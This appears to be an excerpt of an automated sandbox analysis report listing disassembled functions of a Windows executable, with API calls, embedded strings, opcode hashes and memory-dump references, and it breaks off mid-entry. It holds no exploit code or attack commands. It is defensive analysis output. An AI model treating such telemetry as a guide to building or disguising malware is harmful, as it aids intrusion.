                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog$MessageSend__ftol$Window
                                                                                                                • String ID:
                                                                                                                • API String ID: 3039016283-0
                                                                                                                • Opcode ID: de6621fe2cd55b114d4ad39fca9d98210b0e17b4f15ec92d76834ccba1b4460d
                                                                                                                • Instruction ID: dd1a8690cd567b92cacc73c66742930b14a887250b674c969e4e9b1dd606b689
                                                                                                                • Opcode Fuzzy Hash: de6621fe2cd55b114d4ad39fca9d98210b0e17b4f15ec92d76834ccba1b4460d
                                                                                                                • Instruction Fuzzy Hash: 2E31D471A00219AFDB10FFA2DC81EEFB7B9EF44344F00442EF652A7192D7799A418B55
                                                                                                                Function 00454010 Relevance: 9.1, APIs: 6, Instructions: 93windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00453857: IsWindow.USER32(00000000), ref: 0045386E
                                                                                                                • SendMessageA.USER32(00000000,0000018B,00000000,00000000), ref: 0045404D
                                                                                                                • SendMessageA.USER32(00000000,00000187,00000000,00000000), ref: 00454063
                                                                                                                • SendMessageA.USER32(00000000,0000018B,00000000,00000000), ref: 0045407A
                                                                                                                • SendMessageA.USER32(00000000,0000018B,00000000,00000000), ref: 004540A5
                                                                                                                • SendMessageA.USER32(00000000,00000187,00000000,00000000), ref: 004540BB
                                                                                                                • SendMessageA.USER32(00000000,0000018B,00000000,00000000), ref: 004540D2
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$Window
                                                                                                                • String ID:
                                                                                                                • API String ID: 2326795674-0
                                                                                                                • Opcode ID: f73f37e66e0093ad7426274aa7fc7639bd6db05b8b5d674beef4313750dafd8a
                                                                                                                • Instruction ID: cb71a663e24d86ca5d8089c706ae1e1754c4498fe83752c4e92db16ba581ce41
                                                                                                                • Opcode Fuzzy Hash: f73f37e66e0093ad7426274aa7fc7639bd6db05b8b5d674beef4313750dafd8a
                                                                                                                • Instruction Fuzzy Hash: 81318D31104745EFC3148F66CD80C17BBE8FF84B59B21491EBA818B2A2C736EC46CB65
                                                                                                                Function 00458AF6 Relevance: 9.1, APIs: 6, Instructions: 82windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 00458AFB
                                                                                                                  • Part of subcall function 004CCDD5: __EH_prolog.LIBCMT ref: 004CCDDA
                                                                                                                  • Part of subcall function 004CCDD5: GetDC.USER32(?), ref: 004CCE03
                                                                                                                  • Part of subcall function 0040A998: SendMessageA.USER32(?,00000031,00000000,00000000), ref: 0040A9A1
                                                                                                                  • Part of subcall function 004CC886: SelectObject.GDI32(?,00000000), ref: 004CC8A8
                                                                                                                  • Part of subcall function 004CC886: SelectObject.GDI32(?,00000000), ref: 004CC8BE
                                                                                                                • SendMessageA.USER32(?,0000018B,00000000,00000000), ref: 00458B4C
                                                                                                                • SendMessageA.USER32(?,00000194,?,00000000), ref: 00458BB7
                                                                                                                  • Part of subcall function 004CE5EB: SendMessageA.USER32(?,0000018A,?,00000000), ref: 004CE603
                                                                                                                  • Part of subcall function 004CE5EB: SendMessageA.USER32(?,00000189,?,00000000), ref: 004CE61C
                                                                                                                • GetTextExtentPoint32A.GDI32(?,?,?,?), ref: 00458B6F
                                                                                                                • GetSystemMetrics.USER32(00000005), ref: 00458B77
                                                                                                                • SendMessageA.USER32(?,0000018B,00000000,00000000), ref: 00458B98
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$H_prologObjectSelect$ExtentMetricsPoint32SystemText
                                                                                                                • String ID:
                                                                                                                • API String ID: 2552693466-0
                                                                                                                • Opcode ID: 9d3534a4fe118013e16237af719714a3222950b0b6619e8b803ab026f5aeb325
                                                                                                                • Instruction ID: 4e24ceb2a9a9eafaf5ce023eaf1911c9882dc422bf96a0dad04e5962e0b21e8b
                                                                                                                • Opcode Fuzzy Hash: 9d3534a4fe118013e16237af719714a3222950b0b6619e8b803ab026f5aeb325
                                                                                                                • Instruction Fuzzy Hash: 1E314C71900209AFCB14EFA5DD81EEEFBB8EF54354F10412EF501B22A1DB745A06CB64
                                                                                                                Function 00444650 Relevance: 9.1, APIs: 1, Strings: 4, Instructions: 317COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 00444655
                                                                                                                  • Part of subcall function 004C5C1F: InterlockedIncrement.KERNEL32(?), ref: 004C5C34
                                                                                                                  • Part of subcall function 0044441E: __EH_prolog.LIBCMT ref: 00444423
                                                                                                                  • Part of subcall function 00445163: __EH_prolog.LIBCMT ref: 00445168
                                                                                                                  • Part of subcall function 00444A05: __EH_prolog.LIBCMT ref: 00444A0A
                                                                                                                  • Part of subcall function 00444A05: GetFileAttributesA.KERNEL32(?,00510870,?,?,?,?,00000000), ref: 00444A23
                                                                                                                  • Part of subcall function 00444CF5: __EH_prolog.LIBCMT ref: 00444CFA
                                                                                                                  • Part of subcall function 00444A05: SetFileAttributesA.KERNEL32(?,00000080,?,?,?,?,00000000), ref: 00444A86
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog$AttributesFile$IncrementInterlocked
                                                                                                                • String ID: 8$Copy failed$Copy successful$Copying "%s"
                                                                                                                • API String ID: 214135708-1347155598
                                                                                                                • Opcode ID: 351e7756702c8f72fa6103ed87866b5e97e99e26415696db02b3b4af19a2dfb9
                                                                                                                • Instruction ID: 37c55acf32e9cf6dfb612512b4d12dbd8d607f31aa80fcdc46012d1b6e023d66
                                                                                                                • Opcode Fuzzy Hash: 351e7756702c8f72fa6103ed87866b5e97e99e26415696db02b3b4af19a2dfb9
                                                                                                                • Instruction Fuzzy Hash: 24C16274D10608EBDB54EBA5C955BEEBBF4AF48308F10441EF106A3281DB786A45CB69
                                                                                                                Function 004D0A74 Relevance: 9.1, APIs: 6, Instructions: 53stringwindowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • UnpackDDElParam.USER32(000003E8,?,?,?), ref: 004D0A93
                                                                                                                • GlobalLock.KERNEL32(?), ref: 004D0A9B
                                                                                                                • lstrcpyn.KERNEL32(?,00000000,00000208), ref: 004D0AAE
                                                                                                                • GlobalUnlock.KERNEL32(?), ref: 004D0AB7
                                                                                                                • ReuseDDElParam.USER32(?,000003E8,000003E4,00008000,?), ref: 004D0ACF
                                                                                                                • PostMessageA.USER32(?,000003E4,?,00000000), ref: 004D0ADC
                                                                                                                  • Part of subcall function 004C95B9: IsWindowEnabled.USER32(?), ref: 004C95C3
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: GlobalParam$EnabledLockMessagePostReuseUnlockUnpackWindowlstrcpyn
                                                                                                                • String ID:
                                                                                                                • API String ID: 2333435275-0
                                                                                                                • Opcode ID: 80c4f473cda63ebbe29d2c3595a2067c467c10bd839c859f2be82989af61cddf
                                                                                                                • Instruction ID: 03520cb8da1c923db593af3c715295f8be7c9964e64948a690e3b8b2b3f7d9f9
                                                                                                                • Opcode Fuzzy Hash: 80c4f473cda63ebbe29d2c3595a2067c467c10bd839c859f2be82989af61cddf
                                                                                                                • Instruction Fuzzy Hash: 4801AD76600108BFDB01AFA0DC89EDF7BBDEF58304F00417AB90996162DB749E059B64
                                                                                                                Function 00468388 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 232COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 0046838D
                                                                                                                  • Part of subcall function 0045E445: IsWindow.USER32(?), ref: 0045E45D
                                                                                                                  • Part of subcall function 0045E445: GetClientRect.USER32(?,?), ref: 0045E49A
                                                                                                                  • Part of subcall function 004689D6: __EH_prolog.LIBCMT ref: 004689DB
                                                                                                                  • Part of subcall function 0047AAD1: __EH_prolog.LIBCMT ref: 0047AAD6
                                                                                                                  • Part of subcall function 004603AA: __EH_prolog.LIBCMT ref: 004603AF
                                                                                                                  • Part of subcall function 004C5EAA: InterlockedDecrement.KERNEL32(-000000F4), ref: 004C5EBE
                                                                                                                  • Part of subcall function 004C5F18: lstrlen.KERNEL32(?,00000000,00000000,?,00401A07,?,?), ref: 004C5F42
                                                                                                                  • Part of subcall function 004C5FE3: InterlockedIncrement.KERNEL32(-000000F4), ref: 004C6026
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog$Interlocked$ClientDecrementIncrementRectWindowlstrlen
                                                                                                                • String ID: IDS_CTRL_BUTTON_BACK$IDS_CTRL_BUTTON_CANCEL$IDS_CTRL_BUTTON_HELP$IDS_CTRL_BUTTON_NEXT
                                                                                                                • API String ID: 3293047042-2679619293
                                                                                                                • Opcode ID: d8a3774e77b3fd3590e29db3d57dbd696cb2cdaf0d1815ef2357dc87ca4e7c0a
                                                                                                                • Instruction ID: 400d5ad09e73d13d885dbaef853bc776472cde1c6edf188b783ca20929b7f525
                                                                                                                • Opcode Fuzzy Hash: d8a3774e77b3fd3590e29db3d57dbd696cb2cdaf0d1815ef2357dc87ca4e7c0a
                                                                                                                • Instruction Fuzzy Hash: 00819471A006099FCF04DF69C941ADE37A5FF09314F01422EFC15EB292EBB9AA45CB95
                                                                                                                Function 0046C9D3 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 200COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 0046C9D8
                                                                                                                  • Part of subcall function 00468388: __EH_prolog.LIBCMT ref: 0046838D
                                                                                                                • GetDC.USER32(?), ref: 0046CB2B
                                                                                                                • ReleaseDC.USER32(?,?), ref: 0046CB84
                                                                                                                Strings
                                                                                                                • IDS_CTRL_HEADINGTEXT_BODY, xrefs: 0046CAA5
                                                                                                                • IDS_CTRL_STATICTEXT_BODY, xrefs: 0046CA5C
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog$Release
                                                                                                                • String ID: IDS_CTRL_HEADINGTEXT_BODY$IDS_CTRL_STATICTEXT_BODY
                                                                                                                • API String ID: 4065112704-3606236380
                                                                                                                • Opcode ID: a940f1d11d32cd1209a7a2244eb79ba5ac3e9fb4beef388d05a7c1ba29249bb3
                                                                                                                • Instruction ID: f219300eb766582377f6677a51dbe486fc020a33182b9b6bc0bae3f1e035b6cb
                                                                                                                • Opcode Fuzzy Hash: a940f1d11d32cd1209a7a2244eb79ba5ac3e9fb4beef388d05a7c1ba29249bb3
                                                                                                                • Instruction Fuzzy Hash: 817188719006099FCF01DF59C881AEEBBB2FF49314B00812EFC19AB251D7B9AA45CF95
                                                                                                                Function 00468117 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 194COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 0046811C
                                                                                                                  • Part of subcall function 0044FC1E: __EH_prolog.LIBCMT ref: 0044FC23
                                                                                                                  • Part of subcall function 0047AAD1: __EH_prolog.LIBCMT ref: 0047AAD6
                                                                                                                  • Part of subcall function 004603AA: __EH_prolog.LIBCMT ref: 004603AF
                                                                                                                  • Part of subcall function 004C5EAA: InterlockedDecrement.KERNEL32(-000000F4), ref: 004C5EBE
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog$DecrementInterlocked
                                                                                                                • String ID: IDS_CTRL_BUTTON_BACK$IDS_CTRL_BUTTON_CANCEL$IDS_CTRL_BUTTON_HELP$IDS_CTRL_BUTTON_NEXT
                                                                                                                • API String ID: 2206737547-2679619293
                                                                                                                • Opcode ID: a3f3b65316b98b94cf0b9e912e700f2dbe178ac0de3f89540e27e206b973e947
                                                                                                                • Instruction ID: d3287a7e1ee0420e867fcb5a16a498850322c23a212d365a6c6c3676f494c591
                                                                                                                • Opcode Fuzzy Hash: a3f3b65316b98b94cf0b9e912e700f2dbe178ac0de3f89540e27e206b973e947
                                                                                                                • Instruction Fuzzy Hash: 46719570900B06EBCB04EFAAC956AAEBBB4FF44314F10421FE515932C1DB786A51CBA5
                                                                                                                Function 0041CAAE Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 183COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 0041CAB3
                                                                                                                  • Part of subcall function 004C5FE3: InterlockedIncrement.KERNEL32(-000000F4), ref: 004C6026
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prologIncrementInterlocked
                                                                                                                • String ID: 0:R$DIRECT$PROXY$SOCKS
                                                                                                                • API String ID: 1487423697-3623570745
                                                                                                                • Opcode ID: ada8f0a84018501a20d66321760a132a19b1a75b1e7a85cba4c765be8950b41a
                                                                                                                • Instruction ID: 1663e7dfa307c1280a13a731145daf0402fd0f10e9e89f1c2dab1e25c8732c8e
                                                                                                                • Opcode Fuzzy Hash: ada8f0a84018501a20d66321760a132a19b1a75b1e7a85cba4c765be8950b41a
                                                                                                                • Instruction Fuzzy Hash: 22618375500649EFDB04EF61D995EEE3B68EF14348F00411EF806A7281EB78AB85C765
                                                                                                                Function 0043826F Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 140COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 00438274
                                                                                                                  • Part of subcall function 0041EBE5: __EH_prolog.LIBCMT ref: 0041EBEA
                                                                                                                  • Part of subcall function 0041EC79: __EH_prolog.LIBCMT ref: 0041EC7E
                                                                                                                • __ftol.LIBCMT ref: 004382AE
                                                                                                                • __ftol.LIBCMT ref: 004382C1
                                                                                                                  • Part of subcall function 004C5F18: lstrlen.KERNEL32(?,00000000,00000000,?,00401A07,?,?), ref: 004C5F42
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog$__ftol$lstrlen
                                                                                                                • String ID: string$sub
                                                                                                                • API String ID: 2341014993-840957247
                                                                                                                • Opcode ID: adf2a7eb88be220b28ef7be46605e97a351adad90b56ddfb9ffad6d0991728f6
                                                                                                                • Instruction ID: 381909d5fdf81ba84d1b693d844039a228266b458f74f633bec1436e6fbcf363
                                                                                                                • Opcode Fuzzy Hash: adf2a7eb88be220b28ef7be46605e97a351adad90b56ddfb9ffad6d0991728f6
                                                                                                                • Instruction Fuzzy Hash: E3412431809615B6DB15B766DC02FDE76289F56728F240A0FF821722D2EF7D174243AE
                                                                                                                Function 00484010 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 129COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __ftol
                                                                                                                • String ID: invalid format$invalid option$obsolete option `*w' to `read'$too many arguments
                                                                                                                • API String ID: 495808979-4157779061
                                                                                                                • Opcode ID: 15b9554bd7a4ea5b2a5a601a280a116ebceade17c55b0f6e2630c6f085d4b515
                                                                                                                • Instruction ID: e0c2392f2d2f685b4b337f94f51beba311b29aa7caf00e323d1eb288a706bb60
                                                                                                                • Opcode Fuzzy Hash: 15b9554bd7a4ea5b2a5a601a280a116ebceade17c55b0f6e2630c6f085d4b515
                                                                                                                • Instruction Fuzzy Hash: 5531246250412667D2017669BC469AF768CDEE33ADF140E2BF90491242FB0E5A5603FF
                                                                                                                Function 004A0300 Relevance: 8.9, APIs: 7, Instructions: 120stringCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: lstrcpy$lstrlen
                                                                                                                • String ID:
                                                                                                                • API String ID: 367037083-0
                                                                                                                • Opcode ID: c1b4aa99c591744d77e24262de923c41514dfdb4cba4f1819edd85ae8098d2cf
                                                                                                                • Instruction ID: c2000fae65e973bf682877ba267cc6e0eafe41b7713f767df27ed37b344e3950
                                                                                                                • Opcode Fuzzy Hash: c1b4aa99c591744d77e24262de923c41514dfdb4cba4f1819edd85ae8098d2cf
                                                                                                                • Instruction Fuzzy Hash: F83195F24043459ED714DF64AC818AFB7E8ADE9304F44492EF99587201E635EA0DC7A7
                                                                                                                Function 004789D6 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 108COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 004789DB
                                                                                                                  • Part of subcall function 004C5EAA: InterlockedDecrement.KERNEL32(-000000F4), ref: 004C5EBE
                                                                                                                Strings
                                                                                                                Memory Dump Source
